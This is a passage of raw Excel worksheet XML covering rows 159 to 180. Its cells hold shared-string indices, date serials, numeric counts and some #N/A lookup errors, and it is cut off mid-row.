      <c r="E159" s="1" t="s">
        <v>1575</v>
      </c>
      <c r="F159" s="26">
        <v>132</v>
      </c>
      <c r="G159" s="1" t="s">
        <v>1576</v>
      </c>
      <c r="H159" s="1" t="s">
        <v>1577</v>
      </c>
      <c r="I159" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J159" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K159" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L159" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M159" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N159" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O159" s="1" t="s">
        <v>1578</v>
      </c>
      <c r="P159" s="1"/>
      <c r="Q159" s="1" t="s">
        <v>3550</v>
      </c>
      <c r="R159" s="83">
        <v>2987</v>
      </c>
      <c r="S159" s="83">
        <v>2788</v>
      </c>
      <c r="T159" s="83">
        <v>2427</v>
      </c>
      <c r="U159" s="83">
        <v>2126</v>
      </c>
      <c r="V159" s="83">
        <v>2389</v>
      </c>
      <c r="W159" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="160" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A160" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B160" s="51">
        <v>44379.637047951386</v>
      </c>
      <c r="C160" s="1" t="s">
        <v>1590</v>
      </c>
      <c r="D160" s="43">
        <v>100</v>
      </c>
      <c r="E160" s="1" t="s">
        <v>1591</v>
      </c>
      <c r="F160" s="26">
        <v>100</v>
      </c>
      <c r="G160" s="1" t="s">
        <v>1592</v>
      </c>
      <c r="H160" s="1" t="s">
        <v>1593</v>
      </c>
      <c r="I160" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J160" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K160" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L160" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M160" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N160" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O160" s="1"/>
      <c r="P160" s="1"/>
      <c r="Q160" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R160" s="83">
        <v>2983</v>
      </c>
      <c r="S160" s="83">
        <v>2789</v>
      </c>
      <c r="T160" s="83">
        <v>2430</v>
      </c>
      <c r="U160" s="83">
        <v>2124</v>
      </c>
      <c r="V160" s="83">
        <v>2633</v>
      </c>
      <c r="W160" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="161" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A161" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B161" s="51">
        <v>44433.736928368053</v>
      </c>
      <c r="C161" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="D161" s="26">
        <v>111</v>
      </c>
      <c r="E161" s="1" t="s">
        <v>1600</v>
      </c>
      <c r="F161" s="26">
        <v>100</v>
      </c>
      <c r="G161" s="57" t="s">
        <v>1601</v>
      </c>
      <c r="H161" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="I161" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J161" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K161" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L161" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M161" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N161" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O161" s="1"/>
      <c r="P161" s="1"/>
      <c r="Q161" s="1" t="s">
        <v>3551</v>
      </c>
      <c r="R161" s="83">
        <v>47853</v>
      </c>
      <c r="S161" s="83">
        <v>18156</v>
      </c>
      <c r="T161" s="83">
        <v>21457</v>
      </c>
      <c r="U161" s="83">
        <v>26856</v>
      </c>
      <c r="V161" s="83">
        <v>30200</v>
      </c>
      <c r="W161" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="162" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A162" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B162" s="51">
        <v>44519.632626631945</v>
      </c>
      <c r="C162" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="D162" s="43">
        <v>201</v>
      </c>
      <c r="E162" s="1" t="s">
        <v>1600</v>
      </c>
      <c r="F162" s="26">
        <v>200</v>
      </c>
      <c r="G162" s="1" t="s">
        <v>1601</v>
      </c>
      <c r="H162" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="I162" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J162" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K162" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L162" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M162" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N162" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O162" s="1"/>
      <c r="P162" s="1"/>
      <c r="Q162" s="1" t="s">
        <v>3552</v>
      </c>
      <c r="R162" s="83">
        <v>47853</v>
      </c>
      <c r="S162" s="83">
        <v>18156</v>
      </c>
      <c r="T162" s="83">
        <v>21457</v>
      </c>
      <c r="U162" s="83">
        <v>26856</v>
      </c>
      <c r="V162" s="83">
        <v>30200</v>
      </c>
      <c r="W162" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="163" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A163" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B163" s="51">
        <v>44130.302816875002</v>
      </c>
      <c r="C163" s="1" t="s">
        <v>1611</v>
      </c>
      <c r="D163" s="43">
        <v>100</v>
      </c>
      <c r="E163" s="1" t="s">
        <v>1612</v>
      </c>
      <c r="F163" s="26">
        <v>100</v>
      </c>
      <c r="G163" s="1" t="s">
        <v>1613</v>
      </c>
      <c r="H163" s="1" t="s">
        <v>1614</v>
      </c>
      <c r="I163" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J163" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K163" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L163" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M163" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N163" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O163" s="1"/>
      <c r="P163" s="1"/>
      <c r="Q163" s="1" t="s">
        <v>3553</v>
      </c>
      <c r="R163" s="83">
        <v>225</v>
      </c>
      <c r="S163" s="83">
        <v>1468</v>
      </c>
      <c r="T163" s="83">
        <v>283</v>
      </c>
      <c r="U163" s="83">
        <v>268</v>
      </c>
      <c r="V163" s="83">
        <v>268</v>
      </c>
      <c r="W163" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="164" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A164" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B164" s="51">
        <v>44130.302816863426</v>
      </c>
      <c r="C164" s="1" t="s">
        <v>1611</v>
      </c>
      <c r="D164" s="43">
        <v>100</v>
      </c>
      <c r="E164" s="1" t="s">
        <v>1616</v>
      </c>
      <c r="F164" s="26">
        <v>100</v>
      </c>
      <c r="G164" s="1" t="s">
        <v>1617</v>
      </c>
      <c r="H164" s="1" t="s">
        <v>1618</v>
      </c>
      <c r="I164" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J164" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K164" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L164" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M164" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N164" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O164" s="1"/>
      <c r="P164" s="1"/>
      <c r="Q164" s="1" t="s">
        <v>3553</v>
      </c>
      <c r="R164" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S164" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T164" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U164" s="83">
        <v>6</v>
      </c>
      <c r="V164" s="83">
        <v>2</v>
      </c>
      <c r="W164" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="165" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A165" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B165" s="51">
        <v>43977.754807789352</v>
      </c>
      <c r="C165" s="1" t="s">
        <v>1619</v>
      </c>
      <c r="D165" s="43">
        <v>120</v>
      </c>
      <c r="E165" s="1" t="s">
        <v>1620</v>
      </c>
      <c r="F165" s="26">
        <v>101</v>
      </c>
      <c r="G165" s="1" t="s">
        <v>1621</v>
      </c>
      <c r="H165" s="1" t="s">
        <v>1622</v>
      </c>
      <c r="I165" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J165" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K165" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L165" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M165" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N165" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O165" s="1" t="s">
        <v>1623</v>
      </c>
      <c r="P165" s="1" t="s">
        <v>242</v>
      </c>
      <c r="Q165" s="1" t="s">
        <v>3554</v>
      </c>
      <c r="R165" s="83">
        <v>47</v>
      </c>
      <c r="S165" s="83">
        <v>13</v>
      </c>
      <c r="T165" s="83">
        <v>152</v>
      </c>
      <c r="U165" s="83">
        <v>95</v>
      </c>
      <c r="V165" s="83">
        <v>181</v>
      </c>
      <c r="W165" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="166" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A166" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B166" s="51">
        <v>44357.832009259262</v>
      </c>
      <c r="C166" s="1" t="s">
        <v>1619</v>
      </c>
      <c r="D166" s="43">
        <v>120</v>
      </c>
      <c r="E166" s="1" t="s">
        <v>1625</v>
      </c>
      <c r="F166" s="26">
        <v>100</v>
      </c>
      <c r="G166" s="1" t="s">
        <v>1626</v>
      </c>
      <c r="H166" s="1" t="s">
        <v>1627</v>
      </c>
      <c r="I166" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J166" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K166" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L166" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M166" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N166" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O166" s="1" t="s">
        <v>1628</v>
      </c>
      <c r="P166" s="1"/>
      <c r="Q166" s="1" t="s">
        <v>3554</v>
      </c>
      <c r="R166" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S166" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T166" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U166" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V166" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W166" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="167" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A167" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B167" s="51">
        <v>44363.663383263891</v>
      </c>
      <c r="C167" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="D167" s="43">
        <v>100</v>
      </c>
      <c r="E167" s="1" t="s">
        <v>1630</v>
      </c>
      <c r="F167" s="26">
        <v>100</v>
      </c>
      <c r="G167" s="1" t="s">
        <v>1631</v>
      </c>
      <c r="H167" s="1" t="s">
        <v>1632</v>
      </c>
      <c r="I167" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J167" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K167" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L167" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M167" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N167" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O167" s="1"/>
      <c r="P167" s="1"/>
      <c r="Q167" s="1" t="s">
        <v>1633</v>
      </c>
      <c r="R167" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S167" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T167" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U167" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V167" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W167" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="168" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A168" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B168" s="51">
        <v>44363.663383298612</v>
      </c>
      <c r="C168" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="D168" s="43">
        <v>100</v>
      </c>
      <c r="E168" s="1" t="s">
        <v>1634</v>
      </c>
      <c r="F168" s="26">
        <v>100</v>
      </c>
      <c r="G168" s="1" t="s">
        <v>1635</v>
      </c>
      <c r="H168" s="1" t="s">
        <v>1636</v>
      </c>
      <c r="I168" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J168" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K168" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L168" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M168" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N168" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O168" s="1"/>
      <c r="P168" s="1"/>
      <c r="Q168" s="1" t="s">
        <v>1633</v>
      </c>
      <c r="R168" s="83">
        <v>7929</v>
      </c>
      <c r="S168" s="83">
        <v>5966</v>
      </c>
      <c r="T168" s="83">
        <v>6409</v>
      </c>
      <c r="U168" s="83">
        <v>8838</v>
      </c>
      <c r="V168" s="83">
        <v>7497</v>
      </c>
      <c r="W168" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="169" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A169" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B169" s="51">
        <v>44540.730685659721</v>
      </c>
      <c r="C169" s="1" t="s">
        <v>1641</v>
      </c>
      <c r="D169" s="26">
        <v>100</v>
      </c>
      <c r="E169" s="1" t="s">
        <v>1642</v>
      </c>
      <c r="F169" s="26">
        <v>100</v>
      </c>
      <c r="G169" s="1" t="s">
        <v>1643</v>
      </c>
      <c r="H169" s="1" t="s">
        <v>1644</v>
      </c>
      <c r="I169" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J169" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K169" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L169" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M169" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N169" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O169" s="1" t="s">
        <v>1645</v>
      </c>
      <c r="P169" s="1"/>
      <c r="Q169" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R169" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S169" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T169" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U169" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V169" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W169" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="170" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A170" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B170" s="51">
        <v>44525.49595715278</v>
      </c>
      <c r="C170" s="1" t="s">
        <v>1646</v>
      </c>
      <c r="D170" s="26">
        <v>100</v>
      </c>
      <c r="E170" s="1" t="s">
        <v>1647</v>
      </c>
      <c r="F170" s="26">
        <v>100</v>
      </c>
      <c r="G170" s="1" t="s">
        <v>1648</v>
      </c>
      <c r="H170" s="1" t="s">
        <v>1649</v>
      </c>
      <c r="I170" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J170" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K170" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L170" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M170" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N170" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O170" s="1"/>
      <c r="P170" s="1"/>
      <c r="Q170" s="1" t="s">
        <v>3555</v>
      </c>
      <c r="R170" s="83">
        <v>91</v>
      </c>
      <c r="S170" s="83">
        <v>616</v>
      </c>
      <c r="T170" s="83">
        <v>3762</v>
      </c>
      <c r="U170" s="83">
        <v>3408</v>
      </c>
      <c r="V170" s="83">
        <v>5432</v>
      </c>
      <c r="W170" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="171" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A171" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B171" s="51">
        <v>44649.69528</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>1647</v>
      </c>
      <c r="D171" s="26">
        <v>102</v>
      </c>
      <c r="E171" s="1" t="s">
        <v>1651</v>
      </c>
      <c r="F171" s="26">
        <v>102</v>
      </c>
      <c r="G171" s="57" t="s">
        <v>1652</v>
      </c>
      <c r="H171" s="1" t="s">
        <v>1653</v>
      </c>
      <c r="I171" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J171" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K171" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L171" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M171" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N171" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O171" s="1"/>
      <c r="P171" s="1"/>
      <c r="Q171" s="1" t="s">
        <v>3556</v>
      </c>
      <c r="R171" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S171" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T171" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U171" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V171" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W171" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="172" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A172" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B172" s="51">
        <v>44326.923011990744</v>
      </c>
      <c r="C172" s="1" t="s">
        <v>1657</v>
      </c>
      <c r="D172" s="43">
        <v>102</v>
      </c>
      <c r="E172" s="1" t="s">
        <v>1658</v>
      </c>
      <c r="F172" s="43">
        <v>102</v>
      </c>
      <c r="G172" s="1" t="s">
        <v>1659</v>
      </c>
      <c r="H172" s="1" t="s">
        <v>1660</v>
      </c>
      <c r="I172" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J172" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K172" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L172" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M172" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N172" s="1"/>
      <c r="O172" s="1" t="s">
        <v>1661</v>
      </c>
      <c r="P172" s="1"/>
      <c r="Q172" s="1" t="s">
        <v>3557</v>
      </c>
      <c r="R172" s="83">
        <v>20110</v>
      </c>
      <c r="S172" s="83">
        <v>19820</v>
      </c>
      <c r="T172" s="83">
        <v>25748</v>
      </c>
      <c r="U172" s="83">
        <v>34210</v>
      </c>
      <c r="V172" s="83">
        <v>33832</v>
      </c>
      <c r="W172" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="173" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A173" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B173" s="51">
        <v>44320.663404872685</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>1674</v>
      </c>
      <c r="D173" s="43">
        <v>103</v>
      </c>
      <c r="E173" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="F173" s="43">
        <v>103</v>
      </c>
      <c r="G173" s="1" t="s">
        <v>1676</v>
      </c>
      <c r="H173" s="1" t="s">
        <v>1677</v>
      </c>
      <c r="I173" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J173" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K173" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L173" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M173" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N173" s="1"/>
      <c r="O173" s="1"/>
      <c r="P173" s="1"/>
      <c r="Q173" s="1" t="s">
        <v>3558</v>
      </c>
      <c r="R173" s="83">
        <v>3003</v>
      </c>
      <c r="S173" s="83">
        <v>2792</v>
      </c>
      <c r="T173" s="83">
        <v>2449</v>
      </c>
      <c r="U173" s="83">
        <v>2130</v>
      </c>
      <c r="V173" s="83">
        <v>2621</v>
      </c>
      <c r="W173" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="174" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A174" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B174" s="51">
        <v>44320.612678124999</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>633</v>
      </c>
      <c r="D174" s="43">
        <v>100</v>
      </c>
      <c r="E174" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="F174" s="43">
        <v>100</v>
      </c>
      <c r="G174" s="1" t="s">
        <v>1718</v>
      </c>
      <c r="H174" s="1" t="s">
        <v>1719</v>
      </c>
      <c r="I174" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J174" s="1" t="s">
        <v>633</v>
      </c>
      <c r="K174" s="17" t="s">
        <v>21</v>
      </c>
      <c r="L174" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M174" s="1" t="s">
        <v>633</v>
      </c>
      <c r="N174" s="1" t="s">
        <v>634</v>
      </c>
      <c r="O174" s="1"/>
      <c r="P174" s="1"/>
      <c r="Q174" s="1" t="s">
        <v>3559</v>
      </c>
      <c r="R174" s="83">
        <v>30249</v>
      </c>
      <c r="S174" s="83">
        <v>27627</v>
      </c>
      <c r="T174" s="83">
        <v>25490</v>
      </c>
      <c r="U174" s="83">
        <v>26293</v>
      </c>
      <c r="V174" s="83">
        <v>27255</v>
      </c>
      <c r="W174" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="175" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A175" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B175" s="51">
        <v>44783.685339317133</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>1721</v>
      </c>
      <c r="D175" s="26">
        <v>100</v>
      </c>
      <c r="E175" s="1" t="s">
        <v>1722</v>
      </c>
      <c r="F175" s="26">
        <v>100</v>
      </c>
      <c r="G175" s="57" t="s">
        <v>1723</v>
      </c>
      <c r="H175" s="1" t="s">
        <v>1724</v>
      </c>
      <c r="I175" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J175" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K175" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L175" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M175" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N175" s="1"/>
      <c r="O175" s="1"/>
      <c r="P175" s="1"/>
      <c r="Q175" s="1" t="s">
        <v>3560</v>
      </c>
      <c r="R175" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S175" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T175" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U175" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V175" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W175" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="176" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A176" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B176" s="51">
        <v>44783.73468765046</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>1726</v>
      </c>
      <c r="D176" s="26">
        <v>100</v>
      </c>
      <c r="E176" s="1" t="s">
        <v>1727</v>
      </c>
      <c r="F176" s="26">
        <v>100</v>
      </c>
      <c r="G176" s="57" t="s">
        <v>1728</v>
      </c>
      <c r="H176" s="1" t="s">
        <v>1729</v>
      </c>
      <c r="I176" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J176" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K176" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L176" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M176" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N176" s="1"/>
      <c r="O176" s="1"/>
      <c r="P176" s="1"/>
      <c r="Q176" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="R176" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S176" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T176" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U176" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V176" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W176" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="177" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A177" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B177" s="51">
        <v>44292.098849594906</v>
      </c>
      <c r="C177" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D177" s="43">
        <v>105</v>
      </c>
      <c r="E177" s="1" t="s">
        <v>1734</v>
      </c>
      <c r="F177" s="26">
        <v>105</v>
      </c>
      <c r="G177" s="1" t="s">
        <v>1735</v>
      </c>
      <c r="H177" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="I177" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J177" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K177" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L177" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M177" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N177" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O177" s="1"/>
      <c r="P177" s="1"/>
      <c r="Q177" s="1" t="s">
        <v>3562</v>
      </c>
      <c r="R177" s="83">
        <v>21273</v>
      </c>
      <c r="S177" s="83">
        <v>20936</v>
      </c>
      <c r="T177" s="83">
        <v>16902</v>
      </c>
      <c r="U177" s="83">
        <v>17884</v>
      </c>
      <c r="V177" s="83">
        <v>22457</v>
      </c>
      <c r="W177" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="178" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A178" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B178" s="51">
        <v>44369.44911671296</v>
      </c>
      <c r="C178" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="D178" s="43">
        <v>202</v>
      </c>
      <c r="E178" s="1" t="s">
        <v>1745</v>
      </c>
      <c r="F178" s="26">
        <v>101</v>
      </c>
      <c r="G178" s="1" t="s">
        <v>1746</v>
      </c>
      <c r="H178" s="1" t="s">
        <v>1747</v>
      </c>
      <c r="I178" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J178" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K178" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L178" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M178" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N178" s="1" t="s">
        <v>167</v>
      </c>
      <c r="O178" s="1" t="s">
        <v>1748</v>
      </c>
      <c r="P178" s="1"/>
      <c r="Q178" s="1" t="s">
        <v>3563</v>
      </c>
      <c r="R178" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S178" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T178" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U178" s="83">
        <v>1</v>
      </c>
      <c r="V178" s="83">
        <v>2188</v>
      </c>
      <c r="W178" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="179" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A179" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B179" s="51">
        <v>44369.449116643518</v>
      </c>
      <c r="C179" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="D179" s="43">
        <v>202</v>
      </c>
      <c r="E179" s="1" t="s">
        <v>1750</v>
      </c>
      <c r="F179" s="43">
        <v>121</v>
      </c>
      <c r="G179" s="1" t="s">
        <v>1751</v>
      </c>
      <c r="H179" s="1" t="s">
        <v>1752</v>
      </c>
      <c r="I179" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J179" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K179" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L179" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M179" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N179" s="1" t="s">
        <v>167</v>
      </c>
      <c r="O179" s="1" t="s">
        <v>1753</v>
      </c>
      <c r="P179" s="1"/>
      <c r="Q179" s="1" t="s">
        <v>3563</v>
      </c>
      <c r="R179" s="83">
        <v>146809</v>
      </c>
      <c r="S179" s="83">
        <v>167648</v>
      </c>
      <c r="T179" s="83">
        <v>151453</v>
      </c>
      <c r="U179" s="83">
        <v>166315</v>
      </c>
      <c r="V179" s="83">
        <v>247824</v>
      </c>
      <c r="W179" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="180" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A180" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B180" s="51">
        <v>44369.449116689815</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="D180" s="43">
        <v>202</v>
      </c>
